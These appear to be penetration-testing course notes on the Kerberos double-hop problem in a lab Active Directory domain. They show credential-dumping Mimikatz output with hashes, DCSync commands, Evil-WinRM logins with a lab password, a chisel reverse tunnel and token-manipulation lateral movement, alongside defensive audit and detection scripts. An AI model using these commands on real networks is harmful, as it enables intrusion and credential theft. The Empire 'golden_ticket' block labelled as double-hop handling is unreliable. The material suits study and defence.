The Kerberos "Double Hop" Problem is a critical authentication limitation that occurs when attempting to use Kerberos authentication across two or more network hops. This problem frequently arises during lateral movement operations, particularly when using WinRM/PowerShell remoting, and can significantly impact penetration testing and red team operations. Understanding and overcoming this limitation is essential for successful Active Directory exploitation and lateral movement.
Complete Active Directory Compromise Timeline:
Privileged Access (WinRM Access) → Double Hop Problem (Authentication) → Lateral Movement Solutions (Credential Workarounds) → Infrastructure Control (Domain Domination)
Prerequisites from Previous Modules:
- Privileged access achieved: WinRM/PSRemote rights discovered via BloodHound
- Valid domain credentials: Obtained through various attack vectors
- Remote access established: Initial connection to target hosts
- Multi-hop requirements: Need to access additional resources from compromised hosts
Kerberos Tickets:
- Tickets are NOT passwords: Signed pieces of data from the KDC stating resource access rights
- Resource-specific: Each ticket grants access to a specific resource/service
- Non-transferable: Tickets cannot be reused for different services without proper delegation
- Time-limited: Tickets have expiration times and renewal periods
- Delegation-dependent: Require specific delegation configurations for multi-hop scenarios
NTLM Hashes:
- Hash storage: NTLM hash stored in session memory after authentication
- Reusable: Hash can be used for subsequent authentication attempts
- Session-persistent: Available for the duration of the user session
- Multi-hop capable: Can authenticate to multiple resources without additional configuration
Kerberos Authentication Flow:
- Initial Authentication: User authenticates to the KDC and receives a TGT (Ticket Granting Ticket)
- Service Request: User requests a TGS (Ticket Granting Service) ticket for a specific service
- Service Access: TGS ticket sent to the target service for authentication
- Session Establishment: Service validates the ticket and grants access
Attack Host → Target Host A → Target Host B
(Password available) (TGS ticket available) (NO CREDENTIALS: TGT not sent)
Critical Issue: When connecting via WinRM/PowerShell remoting:
- TGS ticket sent: Allows access to the immediate target (Host A)
- TGT ticket NOT sent: Cannot request new TGS tickets for additional resources (Host B)
- No credential caching: Password/hash not stored in remote session memory
- Authentication failure: Subsequent resource access denied
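The distinction above (service ticket only versus a cached TGT) can be checked directly from a session's ticket cache. The following is an added example, not code from the original notes: `Test-KerberosSecondHop` is a name chosen here, and the two sample caches are constructed from the `klist` outputs shown later in these notes (the HTTP service ticket of a plain WinRM session and the `krbtgt/` entry of a RunAs session). Passing captured text through `-KlistOutput` lets it run offline; without that parameter it runs `klist.exe` on the local Windows host.

```powershell
# Added example, not from the original notes. Reads a klist ticket cache and
# reports whether the session holds a TGT (a "krbtgt/REALM" server entry), which
# is what a second Kerberos hop needs. -KlistOutput accepts captured text so the
# check runs offline; without it the function runs klist.exe on the local host.
function Test-KerberosSecondHop {
    param(
        [string[]]$KlistOutput
    )
    if (-not $KlistOutput) {
        $KlistOutput = & klist.exe 2>&1 | ForEach-Object { "$_" }
    }

    # Every cached ticket has a "Server: <spn> @ <realm>" line; collect the SPNs
    $servers = @($KlistOutput | ForEach-Object {
        if ($_ -match '^\s*Server:\s*(\S+)') { $Matches[1] }
    })

    $hasTgt = [bool]($servers | Where-Object { $_ -like 'krbtgt/*' })
    $explanation = if ($hasTgt) {
        'TGT cached: the session can request service tickets for further hosts.'
    } else {
        'Only service ticket(s) cached: a request to a further host (second hop) ' +
        'fails unless credentials are supplied explicitly or a TGT is obtained.'
    }

    [pscustomobject]@{
        CachedServers  = $servers
        HasTgt         = $hasTgt
        SecondHopReady = $hasTgt
        Explanation    = $explanation
    }
}

# Constructed sample: ticket cache of a plain WinRM session (service ticket only,
# values taken from the klist output shown in these notes)
$firstHopOnly = @(
    'Current LogonId is 0:0x11e387',
    'Cached Tickets: (1)',
    '#0>     Client: backupadm @ INLANEFREIGHT.LOCAL',
    '        Server: HTTP/ACADEMY-AEN-DEV01.INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL'
)
# Constructed sample: cache of a session started through a RunAs configuration
$withTgt = @(
    'Current LogonId is 0:0x2239ba',
    'Cached Tickets: (1)',
    '#0>     Client: backupadm @ INLANEFREIGHT.LOCAL',
    '        Server: krbtgt/INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL'
)

Test-KerberosSecondHop -KlistOutput $firstHopOnly | Format-List
Test-KerberosSecondHop -KlistOutput $withTgt | Format-List
```

The first sample reports `SecondHopReady` as false (only `HTTP/...` is cached), the second as true (`krbtgt/INLANEFREIGHT.LOCAL` is cached). Run without `-KlistOutput` inside a remote session, the function gives the same answer that the PowerView failure below demonstrates the hard way.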
Lab Environment:
- Attack Host: Parrot/Kali Linux (domain-external)
- Target Host A: DEV01 (domain-joined, WinRM accessible)
- Target Host B: DC01 (Domain Controller, PowerView target)
- Credentials: INLANEFREIGHT\backupadm with Remote Management Users group membership
Demonstrating the Problem:
```powershell
# Connect via WinRM from Windows host
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm
```
```bash
# Or via Evil-WinRM from Linux
evil-winrm -i 172.16.8.50 -u backupadm -p '!qazXSW@'
```
```powershell
# From within WinRM session on DEV01
cd 'C:\Users\Public\'
.\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
```
Critical Observation: Mimikatz output shows NO credentials for the backupadm user; only the srvadmin logon session appears:
```
Authentication Id : 0 ; 1284107 (00000000:0013980b)
Session           : Interactive from 1
User Name         : srvadmin
Domain            : INLANEFREIGHT
Logon Server      : DC01
Logon Time        : 6/28/2022 3:46:05 PM
SID               : S-1-5-21-1666128402-2659679066-1433032234-1107
        msv :
         [00000003] Primary
         * Username : srvadmin
         * Domain   : INLANEFREIGHT
         * NTLM     : cf3a5525ee9414229e66279623ed5c58
         * SHA1     : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
         * DPAPI    : 64fa83034ef8a3a9b52c1861ac390bce
        tspkg :
        wdigest :
         * Username : srvadmin
         * Domain   : INLANEFREIGHT
         * Password : (null)
        kerberos :
         * Username : srvadmin
         * Domain   : INLANEFREIGHT.LOCAL
         * Password : (null)
        ssp :
        credman :
```
Process Verification: WinRM processes running as backupadm:
```powershell
tasklist /V | findstr backupadm
# Output:
# wsmprovhost.exe    1844 Services    0   85,212 K Unknown    INLANEFREIGHT\backupadm    0:00:03 N/A
```
```powershell
# Check cached Kerberos tickets
klist
# Output shows only the local service ticket:
Current LogonId is 0:0x57f8a
Cached Tickets: (1)
#0>     Client: backupadm @ INLANEFREIGHT.LOCAL
        Server: academy-aen-ms0$ @
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0xa10000 -> renewable pre_authent name_canonicalize
        Start Time: 6/28/2022 7:31:53 (local)
        End Time:   6/28/2022 7:46:53 (local)
        Renew Time: 7/5/2022 7:31:18 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x4 -> S4U
        Kdc Called: DC01.INLANEFREIGHT.LOCAL
```
```powershell
# Import PowerView module
Import-Module .\PowerView.ps1
# Attempt domain enumeration (FAILS)
Get-DomainUser -SPN
# Error Output:
Exception calling "FindAll" with "0" argument(s): "An operations error occurred."
At C:\Users\backupadm\Documents\PowerView.ps1:5253 char:20
+             else { $Results = $UserSearcher.FindAll() }
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DirectoryServicesCOMException
```
PSCredential Object method:
- Evil-WinRM sessions: Works perfectly with Linux attack hosts
- Non-interactive sessions: No GUI access required
- Command-by-command basis: Credentials passed with each PowerView command
- Flexibility: Can be used with any PowerShell cmdlet supporting the -Credential parameter
1. Establish WinRM Session:
```bash
# From Linux attack host
evil-winrm -i 172.16.8.50 -u backupadm -p '!qazXSW@'
```
2. Create PSCredential Object:
```powershell
# Convert password to SecureString
$SecPassword = ConvertTo-SecureString '!qazXSW@' -AsPlainText -Force
# Create PSCredential object
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)
```
3. Execute Commands with Credentials:
```powershell
# Import PowerView
Import-Module .\PowerView.ps1
# Successful domain enumeration with credential object
Get-DomainUser -SPN -Credential $Cred | Select-Object samaccountname
# Expected Output:
samaccountname
--------------
azureconnect
backupjob
krbtgt
mssqlsvc
sqltest
sqlqa
sqldev
mssqladm
svc_sql
sqlprod
sapsso
sapvc
vmwarescvc
```
4. Verification of Failure Without Credentials:
```powershell
# Attempt without credential object (FAILS)
Get-DomainUser -SPN | Select-Object samaccountname
# Error Output:
Exception calling "FindAll" with "0" argument(s): "An operations error occurred."
```
Advantages:
- ✅ Works with Evil-WinRM: Perfect for Linux-based attack hosts
- ✅ No GUI required: Fully command-line compatible
- ✅ Flexible application: Can be used with any credential-supporting cmdlet
- ✅ Immediate solution: No service restarts or configuration changes required
Disadvantages:
- ❌ Command-by-command: Must specify credentials with each command
- ❌ Tool compatibility: Some tools may not support the -Credential parameter
- ❌ Verbose syntax: Increases command complexity
PSSession Configuration method, when to use:
- GUI access available: RDP or physical console access to a Windows host
- Administrative privileges: Ability to register PSSession configurations
- Persistent sessions: Long-term enumeration without repeated credential passing
- Tool compatibility: Works with tools that don't support the -Credential parameter
Requirements:
- Windows attack host or compromised domain-joined machine
- GUI access via RDP
- Administrative privileges on the host
- PowerShell console (not Evil-WinRM)
1. Initial WinRM Connection:
```powershell
# From Windows PowerShell console
Enter-PSSession -ComputerName ACADEMY-AEN-DEV01.INLANEFREIGHT.LOCAL -Credential inlanefreight\backupadm
```
2. Verify Double Hop Problem:
```powershell
# Check cached tickets (shows only the HTTP service ticket)
klist
# Output:
Current LogonId is 0:0x11e387
Cached Tickets: (1)
#0>     Client: backupadm @ INLANEFREIGHT.LOCAL
        Server: HTTP/ACADEMY-AEN-DEV01.INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
```
3. Register New PSSession Configuration:
```powershell
# Exit current session first
Exit-PSSession
# Register new session configuration with RunAs credentials
Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential inlanefreight\backupadm
# WARNING: When RunAs is enabled in a Windows PowerShell session configuration,
# the Windows security model cannot enforce a security boundary between different
# user sessions that are created by using this endpoint.
```
4. Restart WinRM Service:
```powershell
# Restart WinRM service (will disconnect current sessions)
Restart-Service WinRM
```
5. Connect Using Named Configuration:
```powershell
# Establish new session with registered configuration
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName backupadmsess
```
6. Verify Ticket Availability:
```powershell
# Check cached tickets (now shows a TGT)
klist
# Output:
Current LogonId is 0:0x2239ba
Cached Tickets: (1)
#0>     Client: backupadm @ INLANEFREIGHT.LOCAL
        Server: krbtgt/INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 6/28/2022 13:24:37 (local)
        End Time:   6/28/2022 23:24:37 (local)
        Renew Time: 7/5/2022 13:24:37 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: DC01
```
7. Successful Domain Enumeration:
```powershell
# Import PowerView
Import-Module .\PowerView.ps1
# Execute commands without credential object
Get-DomainUser -SPN | Select-Object samaccountname
# Successful Output:
samaccountname
--------------
azureconnect
backupjob
krbtgt
mssqlsvc
sqltest
sqlqa
sqldev
mssqladm
svc_sql
sqlprod
sapsso
sapvc
vmwarescvc
```
Advantages:
- ✅ Persistent solution: No need to pass credentials with each command
- ✅ Tool compatibility: Works with all PowerShell tools and modules
- ✅ Native authentication: Proper Kerberos ticket caching
- ✅ Performance: Faster execution without repeated authentication
Disadvantages:
- ❌ GUI requirement: Cannot be used with Evil-WinRM
- ❌ Administrative privileges: Requires the ability to register PSSession configurations
- ❌ Service restart: Requires a WinRM service restart
- ❌ Platform limitation: Does not work from Linux PowerShell due to Kerberos limitations
Common Scenarios:
- Parrot Linux → DEV01 (WinRM) → DC01 (PowerView/BloodHound). Solution: PSCredential Object method via Evil-WinRM
- Windows Attack Box → Jump Server (RDP/PSSession) → File Servers/SQL Servers. Solution: PSSession Configuration or PSCredential Object method
- User Workstation → DC01 (DCSync) → Trusted Domain Controllers. Solution: Depends on delegation configuration and trust relationship
Tools Affected by the Double Hop:
```powershell
# These commands require Domain Controller communication:
Get-DomainUser -SPN                     # Kerberoastable accounts
Get-DomainComputer                      # Domain computers
Get-DomainGroupMember "Domain Admins"   # Privileged users
Find-LocalAdminAccess                   # Local admin rights
Get-DomainTrust                         # Trust relationships
```
```powershell
# SharpHound requires extensive AD queries:
.\SharpHound.exe -c All                 # Complete domain enumeration
.\SharpHound.exe -c Session,LoggedOn    # Session and logon data
```
```powershell
# Mimikatz DCSync (requires DC communication):
.\mimikatz "lsadump::dcsync /user:krbtgt" exit
.\mimikatz "lsadump::dcsync /user:Administrator" exit
```
Unconstrained Delegation: if unconstrained delegation is enabled on a server:
- TGT ticket forwarded: User's TGT sent along with the TGS request
- Credential caching: Target server caches the user's TGT
- Impersonation capability: Server can request TGS tickets on the user's behalf
- Attack opportunity: Unconstrained delegation servers are high-value targets
```powershell
# PowerView query for unconstrained delegation
Get-DomainComputer -Unconstrained | Select-Object name
# LDAP query for unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
```
Constrained Delegation:
- Limited scope: Delegation only to specific services
- Protocol transition: May allow protocol changes (Kerberos to NTLM)
- S4U2Self/S4U2Proxy: Service for User extensions enable constrained delegation
Resource-Based Constrained Delegation:
- Target-controlled: Delegation configured on the target resource
- Modern approach: Newer delegation method in Windows 2012+
- Attack vector: Can be abused if target object permissions allow modification
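The three delegation types above are what decide whether an identity can be carried past the first hop at all, so an administrator wants all three in one audit. The following is an added example, not code from the original notes: `Get-DelegationAudit` is a name chosen here, it assumes the RSAT ActiveDirectory module on a domain-joined host, the group list is an assumption for the example, and the attribute names (`msDS-AllowedToDelegateTo`, `msDS-AllowedToActOnBehalfOfOtherIdentity`, `AccountNotDelegated`) are the standard AD ones. It goes a step beyond the single unconstrained query shown above by also listing constrained and resource-based delegation and by flagging privileged accounts that are still delegatable.

```powershell
# Added example, not from the original notes. Read-only audit of the delegation
# settings that decide how far an identity can be carried past the first hop.
# Assumes the RSAT ActiveDirectory module on a domain-joined host; attribute names
# are the standard AD ones, the group list is an assumption for the example.
Import-Module ActiveDirectory

function Get-DelegationAudit {
    param(
        [string[]]$PrivilegedGroups = @('Domain Admins', 'Enterprise Admins', 'Administrators')
    )
    # Unconstrained delegation: the host receives and caches callers' TGTs.
    # Domain controllers (primary group RID 516, RODCs 521) are skipped because
    # they carry the flag by design.
    $unconstrained = Get-ADComputer -Filter { TrustedForDelegation -eq $true } -Properties TrustedForDelegation, PrimaryGroupID |
        Where-Object { $_.PrimaryGroupID -notin 516, 521 } |
        Select-Object Name, DistinguishedName

    # Constrained delegation: objects allowed to delegate to the listed SPNs.
    # userAccountControl bit 0x1000000 (TRUSTED_TO_AUTH_FOR_DELEGATION) marks
    # protocol transition, i.e. the object may obtain tickets for any user itself.
    $constrained = Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' -Properties msDS-AllowedToDelegateTo, userAccountControl |
        Select-Object Name,
            @{ n = 'AllowedTo';          e = { $_.'msDS-AllowedToDelegateTo' -join '; ' } },
            @{ n = 'ProtocolTransition'; e = { ($_.userAccountControl -band 0x1000000) -ne 0 } }

    # Resource-based constrained delegation: the ACL lives on the target object,
    # so the principals named in it are the ones allowed to act on users' behalf
    $rbcd = Get-ADObject -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' -Properties msDS-AllowedToActOnBehalfOfOtherIdentity |
        Select-Object Name,
            @{ n = 'AllowedFrom'; e = { @($_.'msDS-AllowedToActOnBehalfOfOtherIdentity'.Access.IdentityReference) -join '; ' } }

    # Mitigation check: privileged accounts still missing "Account is sensitive
    # and cannot be delegated" (AccountNotDelegated), whose TGTs could otherwise
    # be cached on an unconstrained host
    $notFlagged = foreach ($group in $PrivilegedGroups) {
        Get-ADGroupMember -Identity $group -Recursive -ErrorAction SilentlyContinue |
            Where-Object { $_.objectClass -eq 'user' } |
            ForEach-Object { Get-ADUser -Identity $_.distinguishedName -Properties AccountNotDelegated } |
            Where-Object { -not $_.AccountNotDelegated } |
            Select-Object SamAccountName, @{ n = 'Group'; e = { $group } }
    }

    [pscustomobject]@{
        UnconstrainedHosts      = @($unconstrained)
        ConstrainedDelegation   = @($constrained)
        ResourceBasedDelegation = @($rbcd)
        PrivilegedNotFlagged    = @($notFlagged | Sort-Object SamAccountName -Unique)
    }
}

$audit = Get-DelegationAudit
$audit.UnconstrainedHosts    | Format-Table -AutoSize
$audit.ConstrainedDelegation | Format-Table -AutoSize
$audit.PrivilegedNotFlagged  | Format-Table -AutoSize
```

Any non-DC host in `UnconstrainedHosts`, and any account in `PrivilegedNotFlagged`, is a finding: together they are the combination that lets a cached TGT be reused for further hops. Membership of the Protected Users group is an alternative to the `AccountNotDelegated` flag and is not covered by this check.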
CredSSP Authentication:
```powershell
# Enable CredSSP on client
Enable-WSManCredSSP -Role Client -DelegateComputer "target-server"
# Enable CredSSP on server
Enable-WSManCredSSP -Role Server
# Connect using CredSSP
Enter-PSSession -ComputerName "target" -Credential $cred -Authentication CredSSP
```
- Credential exposure: Sends credentials to the remote server
- Security risk: Credentials cached on the target system
- Use with caution: Only in trusted environments
Port Forwarding and Tunneling:
```bash
# Forward RDP through SSH tunnel
ssh -L 3389:target-dc:3389 user@jump-host
# Forward LDAP through SSH tunnel
ssh -L 389:target-dc:389 user@jump-host
```
```bash
# SOCKS proxy for application-layer forwarding
./chisel server -p 8080 --reverse
./chisel client target-ip:8080 R:1080:socks
```
Process Injection and Token Manipulation:
```powershell
# Inject into process running as target user
Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "target-user"
```
- Create process: Start a new process as the target user
- Inject payload: Insert shellcode or a .NET assembly
- Inherit context: Process runs with the target user's full credentials
Detection and Monitoring:
```powershell
# Monitor PSSession configuration changes
Get-PSSessionConfiguration
# Event ID monitoring:
# 4103 - PowerShell Script Block Logging
# 4104 - PowerShell Script Block Logging (detailed)
# 400-403 - Windows Remote Management events
```
```powershell
# Monitor CredSSP configuration changes
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation"
# Event ID monitoring:
# 4624 - Account logon (Network, Type 3)
# 4648 - Logon with explicit credentials
```
```powershell
# Enable detailed PowerShell logging (create the policy key first; Set-ItemProperty fails if it does not exist)
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockInvocationLogging" -Value 1
```
```powershell
# Enable PowerShell module logging for all modules (create the policy keys first)
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name "EnableModuleLogging" -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames" -Name "*" -Value "*"
```
Kerberos Traffic Analysis:
- AS-REQ/AS-REP: Initial authentication requests
- TGS-REQ/TGS-REP: Service ticket requests
- Unusual patterns: Multiple service ticket requests from a single host
- Cross-subnet authentication: Unexpected Kerberos traffic patterns
WinRM Traffic Analysis:
- Port 5985/5986: Monitor WinRM HTTP/HTTPS traffic
- SOAP XML analysis: Examine WinRM command content
- Session duration: Identify long-running remote sessions
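The monitoring points listed above can be combined into one host-side check that looks for the two workarounds directly. The following is an added example, not code from the original notes: `Get-DoubleHopWorkaroundIndicators` is a name chosen here, the registry path is the one given in these notes, `WSMan:\localhost\Service\Auth\CredSSP` is the standard WSMan provider path, and the 4648 field names (`SubjectUserName`, `TargetUserName`, `TargetServerName`, `ProcessName`, ...) are the standard EventData names. The 4648 filter on `wsmprovhost.exe` is the assumption that explicit credential use from inside a WinRM session (the PSCredential method) typically surfaces as a 4648 raised by the WinRM host process.

```powershell
# Added example, not from the original notes. Host-side checks for the two
# workarounds described above: WinRM endpoints registered with a RunAs account,
# CredSSP delegation settings, and 4648 "logon with explicit credentials" events
# raised by wsmprovhost.exe (the WinRM host process), which is how credential
# objects used inside a remote session typically surface. Run elevated on the
# monitored host; field names are the standard 4648 EventData names.
function Get-DoubleHopWorkaroundIndicators {
    param([int]$Hours = 24)

    # 1. Session configurations with RunAsUser set: every connection to such an
    #    endpoint runs as that account with a full TGT, whoever the caller is
    $runAsEndpoints = Get-PSSessionConfiguration |
        Where-Object { $_.RunAsUser } |
        Select-Object Name, RunAsUser, Permission

    # 2. CredSSP: client-side delegation policy (registry path from these notes)
    #    and whether the local WinRM service accepts CredSSP
    $policyPath    = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation'
    $credSspPolicy = Get-ItemProperty -Path $policyPath -ErrorAction SilentlyContinue
    $credSspServer = (Get-Item -Path 'WSMan:\localhost\Service\Auth\CredSSP' -ErrorAction SilentlyContinue).Value

    # 3. Explicit-credential logons (4648) whose source process is wsmprovhost.exe
    $since  = (Get-Date).AddHours(-$Hours)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4648; StartTime = $since } -ErrorAction SilentlyContinue
    $fromWinRm = foreach ($e in $events) {
        $data = @{}
        ([xml]$e.ToXml()).Event.EventData.Data | ForEach-Object { $data[$_.Name] = $_.'#text' }
        if ($data['ProcessName'] -like '*\wsmprovhost.exe') {
            [pscustomobject]@{
                Time           = $e.TimeCreated
                SessionUser    = '{0}\{1}' -f $data['SubjectDomainName'], $data['SubjectUserName']
                CredentialUsed = '{0}\{1}' -f $data['TargetDomainName'], $data['TargetUserName']
                TargetServer   = $data['TargetServerName']
                Process        = $data['ProcessName']
            }
        }
    }

    [pscustomobject]@{
        RunAsEndpoints        = @($runAsEndpoints)
        CredSspAllowFresh     = $credSspPolicy.AllowFreshCredentials
        CredSspServerEnabled  = $credSspServer
        ExplicitCredFromWinRm = @($fromWinRm)
    }
}

$result = Get-DoubleHopWorkaroundIndicators -Hours 24
$result.RunAsEndpoints        | Format-Table -AutoSize
$result.ExplicitCredFromWinRm | Format-Table -AutoSize
```

A RunAs endpoint is only expected where one was deliberately registered (the Register-PSSessionConfiguration warning quoted above explains why it matters), so any unexplained entry in `RunAsEndpoints` is worth a ticket on its own. `ExplicitCredFromWinRm` rows where `CredentialUsed` differs from `SessionUser`, or where `TargetServer` is a domain controller, are the ones to triage first.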
Attack Host → Domain A Server → Domain B Controller → Domain C Resources
Challenges:
- Cross-domain authentication: Different Kerberos realms
- Trust relationship dependencies: Transitive vs. non-transitive trusts
- Delegation configurations: Per-domain delegation settings
On-Premises → Azure AD Connect → Azure AD → Cloud Resources
Considerations:
- Authentication protocols: Kerberos vs. SAML vs. OAuth
- Credential synchronization: Password hash sync vs. pass-through authentication
- Hybrid identity: On-premises accounts with cloud access
```powershell
# Function to handle double hop automatically: the credential object that
# authenticated the first hop is forwarded into the remote session and appended
# to the command, so the second hop authenticates explicitly. The module the
# command comes from (e.g. PowerView) must already be available in the remote session.
function Invoke-DoubleHopWorkaround {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][PSCredential]$Credential,
        [Parameter(Mandatory)][string]$Command
    )
    # The same PSCredential is used for the first hop and passed as an argument
    # so the remote command can use it for the second hop
    Invoke-Command -ComputerName $ComputerName -Credential $Credential -ScriptBlock {
        param($Cred, $Cmd)
        # $Cred is left unexpanded so it resolves inside the remote session
        Invoke-Expression "$Cmd -Credential `$Cred"
    } -ArgumentList $Credential, $Command
}
# Usage: Invoke-DoubleHopWorkaround -ComputerName DEV01 -Credential $Cred -Command 'Get-DomainUser -SPN'
```
```
# Empire module for double hop handling
usemodule credentials/mimikatz/golden_ticket
set Credential domain\user:password
set Target target-server
execute
```
Key Concepts:
- Kerberos vs. NTLM: Fundamental difference in credential handling
- Ticket mechanics: TGT vs. TGS ticket usage and limitations
- Authentication delegation: Constrained, unconstrained, and resource-based delegation
- Network protocols: WinRM, RDP, and their authentication mechanisms
Workaround Methods:
- PSCredential Object: Universal solution for Evil-WinRM and command-line scenarios
- PSSession Configuration: Persistent solution for GUI-accessible Windows hosts
- Alternative methods: CredSSP, port forwarding, and process injection techniques
- Tool compatibility: Understanding which tools support which workarounds
Operational Considerations:
- Attack platform: Linux vs. Windows attack host capabilities
- Target environment: Domain topology and delegation configurations
- Detection risk: Monitoring and logging considerations
- Persistence vs. stealth: Balancing effectiveness with operational security
Applications:
- Red team operations: Realistic attack simulation with proper lateral movement
- Penetration testing: Comprehensive domain exploitation methodology
- Security assessment: Understanding authentication boundaries and limitations
- Incident response: Recognizing double hop exploitation techniques
🔑 Complete mastery of Kerberos "Double Hop" Problem - from technical understanding through practical workarounds to advanced attack chains - representing essential Active Directory lateral movement expertise for enterprise penetration testing!